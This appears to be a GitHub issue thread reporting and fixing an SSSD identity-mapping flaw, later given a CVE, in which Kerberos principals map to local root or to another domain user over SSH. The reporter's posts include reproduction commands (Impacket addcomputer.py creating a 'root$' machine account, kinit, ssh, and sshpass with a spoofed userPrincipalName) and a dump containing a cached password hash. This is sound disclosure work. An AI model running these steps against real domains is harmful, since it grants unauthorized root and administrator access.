potentially dangerous id mapping between local and domain users

[gatariee]

using sssd 2.6.3 (current latest version on the ubuntu packages) to facilitate SSH authentication via GSSAPI.

# /etc/sssd/sssd.conf
[sssd]
domains = asia.earth.local
config_file_version = 2
services = nss, pam

[domain/asia.earth.local]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = False
krb5_realm = ASIA.EARTH.LOCAL
realmd_tags = manages-system joined-with-adcli 
id_provider = ad
fallback_homedir = /home/%u
ad_domain = asia.earth.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = simple
simple_allow_groups = Everyone@asia.earth.local, Domain Admins@asia.earth.local, Domain Users@asia.earth.local

# /etc/ssh/sshd_config

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Include /etc/ssh/sshd_config.d/*.conf

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
# PasswordAuthentication no
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
KbdInteractiveAuthentication no

# Kerberos options
KerberosAuthentication yes
#KerberosOrLocalPasswd yes
KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
GSSAPIAuthentication yes
GSSAPICleanupCredentials yes
GSSAPIStrictAcceptorCheck no
GSSAPIKeyExchange yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the KbdInteractiveAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via KbdInteractiveAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and KbdInteractiveAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
PubkeyAcceptedKeyTypes=+ssh-rsa

authenticating to this endpoint with the Kerberos ticket of a machine account named root$ from the asia.earth.local domain seems to incorrectly map to the local root user.

$ klist                      
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: root@ASIA.EARTH.LOCAL

Valid starting       Expires              Service principal
07/06/2025 05:53:45  07/06/2025 15:53:45  krbtgt/ASIA.EARTH.LOCAL@ASIA.EARTH.LOCAL
        renew until 07/07/2025 05:53:43

$ ssh 10.5.20.74 -l root id                
uid=0(root) gid=0(root) groups=0(root)

the same behavior can be observed using any domain account, in this example testuser1234 exists in both the asia.earth.local realm as well as a local user at 10.5.20.74.

$ kinit testuser1234@ASIA.EARTH.LOCAL
Password for testuser1234@ASIA.EARTH.LOCAL: 

$ ssh 10.5.20.74 -l testuser1234 id                
uid=1003(testuser1234) gid=1003(testuser1234) groups=1003(testuser1234)

$ ssh 'testuser1234@asia.earth.local'@10.5.20.74 id
testuser1234@asia.earth.local@10.5.20.74's password: 
uid=1753602609(testuser1234@asia.earth.local) gid=1753600513(domain users@asia.earth.local) groups=1753600513(domain users@asia.earth.local)

since by default, domain users can create up to 10 machine accounts this could be dangerous.

[sumit-bose]

Hi,

to avoid this kind of issues SSSD provides a localauth plugin, please see man sssd_krb5_localauth_plugin about how to configure it.

HTH

bye,
Sumit

[gatariee]

sssd_krb5_localauth_plugin

hey, I installed this plugin as per the manual, but it doesn't seem to be preventing the incorrect mapping.

root@staging01:~# cat /etc/krb5.conf 

[libdefaults]
udp_preference_limit = 0
default_realm = ASIA.EARTH.LOCAL

[plugins]
 localauth = {
  module = sssd:/usr/lib/x86_64-linux-gnu/sssd/modules/sssd_krb5_localauth_plugin.so
 }

root@staging01:~# file /usr/lib/x86_64-linux-gnu/sssd/modules/sssd_krb5_localauth_plugin.so
/usr/lib/x86_64-linux-gnu/sssd/modules/sssd_krb5_localauth_plugin.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=7450501ab260236ff74c20f0b6e238182da16e6c, stripped

root@staging01:~# cat /etc/sssd/sssd.conf

[sssd]
domains = asia.earth.local
config_file_version = 2
services = nss, pam
debug_level = 9

[domain/asia.earth.local]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = ASIA.EARTH.LOCAL
realmd_tags = manages-system joined-with-adcli 
id_provider = ad
fallback_homedir = /home/%u
ad_domain = asia.earth.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = simple
simple_allow_groups = Domain Admins@asia.earth.local, Linux-Admins@asia.earth.local, T0-Fileshare-Admins@asia.earth.local
debug_level = 9

However, it seems like it's allowing me to log in as the root user. The full logs can be found here: https://pastebin.com/EdAAVBWe.

~$ addcomputer.py 'asia.earth.local'/'async_testuser-001':'P@ssw0rd' -computer-name 'root$' -computer-pass 'r00t_C0mput3r'
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account root$ with password r00t_C0mput3r.

~$ echo 'r00t_C0mput3r' | kinit 'root'
Password for root@ASIA.EARTH.LOCAL:

~$ ssh 'root'@STAGING01.asia.earth.local id
uid=0(root) gid=0(root) groups=0(root)

The SSH logs are also available here: https://pastebin.com/d7RheRqb.

[sumit-bose]

Hi,

please try with

[plugins]
 localauth = {
  enable_only = sssd
  module = sssd:/usr/lib/x86_64-linux-gnu/sssd/modules/sssd_krb5_localauth_plugin.so
 }

or as a less restrictive variant

[plugins]
 localauth = {
  disable = an2ln
  module = sssd:/usr/lib64/sssd/modules/sssd_krb5_localauth_plugin.so
 }

The reason is that SSSD cannot resolve root@ASIA.EARTH.LOCAL only root$@ASIA.EARTH.LOCAL. i.e. getent passwd root@ASIA.EARTH.LOCAL returns nothing and getent passwd root$@ASIA.EARTH.LOCAL returns a POSIX entry for the machine account root$. The localauth module tries to resolve the Kerberos principal root@ASIA.EARTH.LOCAL with the help of SSSD which returns nothing. This makes the module assume that SSSD does not handle this user and indicates to libkrb5 that other modules can be called. This is done by default to not break Kerberos authentication for local users. If you check the localauth interface section of man krb5.conf you can see the default modules available in libkrb5. the an2ln module is responsible to the unwanted mapping where just the realm is removed from the principal and the reminder is taken as the local user name.

HTH

bye,
Sumit

[gatariee]

Hey @sumit-bose, I can confirm that both of the above configurations fixed the issue for me, thanks a bunch.

just one more thing, it seems like when a user has their userPrincipalName set to the samAccountName@DOMAIN format of another user, they are logged in as the incorrect user.

the group membership of the incorrect user is also inherited, and sudo -l uses the password of the controlled user.

~$ sshpass -p 'P@ssw0rd123!' ssh 'Administrator@ASIA.EARTH.LOCAL'@STAGING01.asia.earth.local 'whoami ; id'

administrator
uid=957200500(administrator) gid=957200513(domain users) groups=957200513(domain users),957200512(domain admins),957200520(group policy creator owners),957200572(denied rodc password replication group)

This is the contents of the sysdb

root@staging01:~# ldbsearch -H /var/lib/sss/db/cache_asia.earth.local.ldb "name=Administrator@asia.earth.local" 

asq: Unable to register control with rootdse!
# record 1
dn: name=Administrator@asia.earth.local,cn=users,cn=asia.earth.local,cn=sysdb
createTimestamp: 1753872661
fullName: Administrator
gecos: Administrator
gidNumber: 957200513
name: Administrator@asia.earth.local
objectCategory: user
uidNumber: 957200500
objectSIDString: S-1-5-21-2466185732-570816488-1731957910-500
uniqueID: ebb696e8-afab-41ab-a8b1-44a4e7a9fb67
originalDN: CN=Administrator,CN=Users,DC=asia,DC=earth,DC=local
originalMemberOf: CN=Group Policy Creator Owners,CN=Users,DC=asia,DC=earth,DC=
 local
originalMemberOf: CN=Domain Admins,CN=Users,DC=asia,DC=earth,DC=local
originalMemberOf: CN=Administrators,CN=Builtin,DC=asia,DC=earth,DC=local
originalModifyTimestamp: 20250728083332.0Z
entryUSN: 27583
adAccountExpires: 0
adUserAccountControl: 512
nameAlias: administrator@asia.earth.local
isPosix: TRUE
lastUpdate: 1753872661
initgrExpireTimestamp: 0
memberof: name=Denied RODC Password Replication Group@asia.earth.local,cn=grou
 ps,cn=asia.earth.local,cn=sysdb
memberof: name=Domain Admins@asia.earth.local,cn=groups,cn=asia.earth.local,cn
 =sysdb
memberof: name=Group Policy Creator Owners@asia.earth.local,cn=groups,cn=asia.
 earth.local,cn=sysdb
memberof: name=Domain Users@asia.earth.local,cn=groups,cn=asia.earth.local,cn=
 sysdb
pacBlob:: BgAAAAAAAAABAAAA+AEAAGgAAAAAAAAACgAAACQAAABgAgAAAAAAAAwAAAC4AAAAiAIA
 AAAAAAAGAAAAEAAAAEADAAAAAAAABwAAABAAAABQAwAAAAAAABAAAAAQAAAAYAMAAAAAAAABEAgAz
 MzMzOgBAAAAAAAAAAACAGORum5CAdwB/////////3//////////f8beq2ZCAdwBxt6rZkIB3AH///
 //////fxoAGgAEAAIAAAAAAAgAAgAAAAAADAACAAAAAAAQAAIAAAAAABQAAgAAAAAAGAACAAIAAAD
 0AQAAAQIAAAMAAAAcAAIAIAIAAAAAAAAAAAAAAAAAAAAAAAAIAAoAIAACAAgACgAkAAIAKAACAAAA
 AAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAALAACADQAAgABAAAAOAACA
 A0AAAAAAAAADQAAAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAIAAAcAAAAIAgA
 ABwAAAAECAAAHAAAABQAAAAAAAAAEAAAARABDADAAMgAFAAAAAAAAAAQAAABBAFMASQBBAAQAAAAB
 BAAAAAAABRUAAAAEAv+S6PcFIpaUO2cBAAAAMAACAAcAAAABAAAAAQEAAAAAABIBAAAABAAAAAEEA
 AAAAAAFFQAAAAQC/5Lo9wUilpQ7ZwEAAAA8AgAABwAAIAAAAAAA0sSXQgHcARoAQQBkAG0AaQBuAG
 kAcwB0AHIAYQB0AG8AcgAAAAAAPAAYACAAWAADAAAAGgB4ABwAmAAAAAAAQQBkAG0AaQBuAGkAcwB
 0AHIAYQB0AG8AcgBAAGEAcwBpAGEALgBlAGEAcgB0AGgALgBsAG8AYwBhAGwAAAAAAEEAUwBJAEEA
 LgBFAEEAUgBUAEgALgBMAE8AQwBBAEwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAAAAAAAAABB
 QAAAAAABRUAAAAEAv+S6PcFIpaUO2f0AQAAAAAAABAAAAAH/c+J2ScsYtot/E4QAAAA1mH0Ydcuwt
 fzGzk1EAAAACaV1E0itxipLUiHkw==
pacBlobExpireTimestamp: 1753874144
cachedPasswordType: 1
failedLoginAttempts: 0
canonicalUserPrincipalName: S-A.BRANFORD@ASIA.EARTH.LOCAL
dataExpireTimestamp: 1
ccacheFile: FILE:/tmp/krb5cc_957200500_ldxPIL
cachedPassword: $6$.FV2EJt9Fu1npa5q$2fk0PusOlkyzIf/hgk6ytokHwwu8DrkTeroKGGdT8q
 XaVBOlW0ikt0J7Mj63aH2TvyXij.iVpW1.CVXBiMZeF0
lastCachedPasswordChange: 1753893437
lastOnlineAuth: 1753893437
lastOnlineAuthWithCurrentToken: 1753893437
lastLogin: 1753893437
distinguishedName: name=Administrator@asia.earth.local,cn=users,cn=asia.earth.
 local,cn=sysdb

# returned 1 records
# 1 entries
# 0 referrals

the cachedPassword belongs to the S-A.BRANFORD user, logs: https://pastebin.com/skJ0KMZD

[sumit-bose]

Hi,

this should hopefully prevented by the PAC checks in the PAC responder, but iirc those are not available in SSSD-2.6.3. Please check if the sssd.conf man page contains an entry for the pac_check option for the PAC responder.

bye,
Sumit

[alexey-tikhonov]

check if the sssd.conf man page contains an entry for the pac_check option

JFTR: it is available since sssd-2.8.0 (a28f8a3)

[alexey-tikhonov]

@gatariee, did you try PAC checks?

[gatariee]

@gatariee, did you try PAC checks?

i haven't had the time to try yet

[carnil]

According to https://www.cve.org/CVERecord?id=CVE-2025-11561 this has a CVE assigned.